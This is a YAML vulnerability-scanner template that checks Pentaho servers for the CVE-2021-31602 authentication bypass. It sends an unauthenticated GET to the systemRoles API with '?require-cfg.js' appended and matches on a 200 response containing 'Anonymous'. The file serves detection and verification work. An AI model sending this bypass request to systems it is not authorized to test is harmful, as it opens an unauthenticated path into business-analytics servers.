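# Detection check for CVE-2021-31602 (Pentaho authentication bypass; see links).
# Each rule sends one unauthenticated GET to the systemRoles API with
# "?require-cfg.js" appended to the path. A rule matches when the server
# answers 200, sets a JSESSIONID cookie and the body contains "Anonymous",
# i.e. the API responded without a login.
#
# NOTE(review): the body test is a bare substring match. Confirm a hit against
# the installed Pentaho version and the advisories below before recording it
# as a finding; remediation is the vendor fix those advisories reference.
#
# The nesting below is restored from a flattened copy in which every key sat
# at column 0, which made request/expression/path duplicate top-level keys.
name: poc-yaml-pentaho-cve-2021-31602-authentication-bypass
manual: true
transport: http
rules:
  # r0: application deployed under the /pentaho context path.
  r0:
    request:
      cache: true
      method: GET
      path: /pentaho/api/userrolelist/systemRoles?require-cfg.js
      # Redirects are not followed, so a bounce to a login page shows up as a
      # non-200 status and the rule does not match.
      follow_redirects: false
    expression: 'response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"Anonymous")'
  # r1: same request and same match condition, with the API at the web root.
  r1:
    request:
      cache: true
      method: GET
      path: /api/userrolelist/systemRoles?require-cfg.js
      follow_redirects: false
    expression: 'response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"Anonymous")'
# A match on either deployment path is enough to flag the host.
expression: r0() || r1()
detail:
  author: For3stCo1d (https://github.com/For3stCo1d)
  description: "Pentaho-authentication-bypass"
  links:
    - https://packetstormsecurity.com/files/164784/Pentaho-Business-Analytics-Pentaho-Business-Server-9.1-Authentication-Bypass.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31602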